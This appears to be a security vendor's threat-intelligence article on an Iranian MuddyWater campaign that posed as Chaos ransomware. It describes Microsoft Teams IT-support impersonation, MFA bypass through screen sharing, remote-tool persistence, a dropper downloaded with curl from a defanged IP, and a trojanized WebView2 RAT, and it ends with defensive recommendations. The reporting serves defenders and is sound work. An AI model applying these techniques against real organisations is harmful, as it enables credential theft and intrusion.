Iranian state-sponsored threat actor MuddyWater has executed a sophisticated false flag ransomware campaign that weaponizes Microsoft Teams for credential harvesting while masquerading as the Chaos ransomware-as-a-service operation. Rapid7 identified the early 2026 attack, which abandoned traditional file encryption in favor of data exfiltration and long-term network persistence using commercial remote management tools.
The operation represents a deliberate attribution muddying strategy where state-backed operators leverage cybercrime infrastructure and methods to obscure their origins. MuddyWater—also tracked as Mango Sandstorm, Seedworm, and Static Kitten—has increasingly adopted off-the-shelf criminal tools and ransomware affiliate programs to provide operational cover for intelligence collection and destructive attacks serving Iranian strategic objectives.
Teams-Based Social Engineering Attack Chain
The attack sequence begins with unsolicited Microsoft Teams chat requests to employees, with threat actors impersonating IT support personnel. Attackers used interactive screen-sharing sessions to directly observe and manipulate victims into compromising their own security controls. During these sessions, operators harvested credentials and bypassed multi-factor authentication by instructing users to enter credentials into locally created text files while connected.
Once initial access was established through compromised user accounts, MuddyWater deployed legitimate remote access tools including DWAgent and AnyDesk for persistent access. The threat actor executed reconnaissance commands, accessed VPN configuration files, and moved laterally through the environment before exfiltrating data. The victim received ransom demands via email despite no file encryption occurring—maintaining the ransomware facade while prioritizing intelligence collection.
Disable external Teams chat requests for users not requiring this functionality. Implement conditional access policies restricting screen-sharing capabilities. Monitor for unauthorized deployment of remote management tools including AnyDesk, DWAgent, Microsoft Quick Assist, and similar utilities.
Custom Malware Deployment Infrastructure
Beyond commercial tools, the campaign deployed custom malware through a multi-stage infection chain initiated via RDP sessions. Attackers downloaded an executable (ms_upd.exe) from external infrastructure at 172.86.126[.]208 using the curl utility. This dropper, designated Stagecomp by researchers, collected system information and contacted command-and-control servers to deliver secondary payloads including a bespoke remote access trojan.
The custom RAT, designated Darkcomp, masquerades as a legitimate Microsoft WebView2 application by trojanizing the official Microsoft WebView2APISample project. The malware establishes persistence by polling its C2 server every 60 seconds in an infinite loop, enabling operators to execute commands, run PowerShell scripts, perform file operations, and spawn interactive shells. The RAT utilizes an encrypted configuration file (visualwincomp.txt) to obtain C2 information, demonstrating operational security awareness.
Attribution Indicators and Historical Context
Attribution to MuddyWater stems from multiple indicators, most notably the use of a code-signing certificate attributed to "Donald Gay" to sign the ms_upd.exe dropper. This certificate has appeared in previous MuddyWater operations, providing continuity across campaigns. The operational profile aligns with documented MuddyWater tactics including the abuse of legitimate tools, social engineering focus, and strategic targeting.
This is not MuddyWater's first ransomware operation. In September 2020, the group targeted Israeli organizations with PowGoop loader deploying destructive Thanos ransomware variants. In 2023, Microsoft observed MuddyWater collaborating with DEV-1084 to conduct destructive attacks under the DarkBit ransomware persona. As recently as October 2025, the group allegedly used Qilin ransomware against an Israeli government hospital, demonstrating continued investment in ransomware-as-cover tactics.
MuddyWater's adoption of ransomware affiliate programs serves dual purposes: plausible deniability for state-sponsored operations and operational enablement through access to established criminal infrastructure. As Check Point noted, participation in programs like Qilin provides both cover and meaningful operational advantages, particularly as target nations heighten security measures against known Iranian threat actors.
Chaos RaaS Exploitation
The Chaos ransomware-as-a-service operation emerged in early 2025 and operates a traditional affiliate program advertised on cybercrime forums including RAMP and RehubCom. The group employs double extortion combining data theft with encryption threats, and has demonstrated triple extortion capabilities through DDoS threats. Rapid7 identified quadruple extortion tactics including threats to contact customers and competitors to increase victim pressure.
As of late March 2026, Chaos claimed 36 victims on its data leak site, with the majority located in the United States. Primary target sectors include construction, manufacturing, and business services. The group's standard attack methodology involves mail flooding and vishing via Teams, impersonating IT support to trick victims into installing remote access tools, then escalating to ransomware deployment. MuddyWater's hijacking of this methodology while substituting intelligence collection for encryption demonstrates sophisticated understanding of criminal operations.
Defense Recommendations
- Restrict external Microsoft Teams communications to approved domains and disable external access for users without business justification
- Implement application allowlisting to prevent unauthorized remote access tool deployment, specifically monitoring for AnyDesk, DWAgent, Quick Assist, and similar utilities
- Deploy endpoint detection rules for curl and other download utilities executing from RDP sessions or unusual parent processes
- Monitor for code-signing certificates associated with MuddyWater including those attributed to "Donald Gay" and other known aliases
- Implement phishing-resistant MFA methods such as FIDO2 hardware tokens that cannot be bypassed through social engineering screen-sharing tactics
- Establish baseline monitoring for legitimate Microsoft WebView2 applications and alert on unsigned or suspicious variants
- Review VPN configuration file access logs for unauthorized retrieval attempts
- Monitor outbound connections polling at regular 60-second intervals as potential RAT beaconing behavior
Organizations should treat apparent ransomware incidents with heightened scrutiny when targeting patterns, victim selection, or technical indicators suggest strategic rather than financial motivation. The convergence of state-sponsored operators with cybercrime infrastructure complicates attribution and incident response, requiring security teams to maintain awareness of both criminal and nation-state threat actor methodologies regardless of initial attack presentation.
Questions about your exposure?
RedEye Security provides assessments for organizations that need to understand their real risk.
Talk to us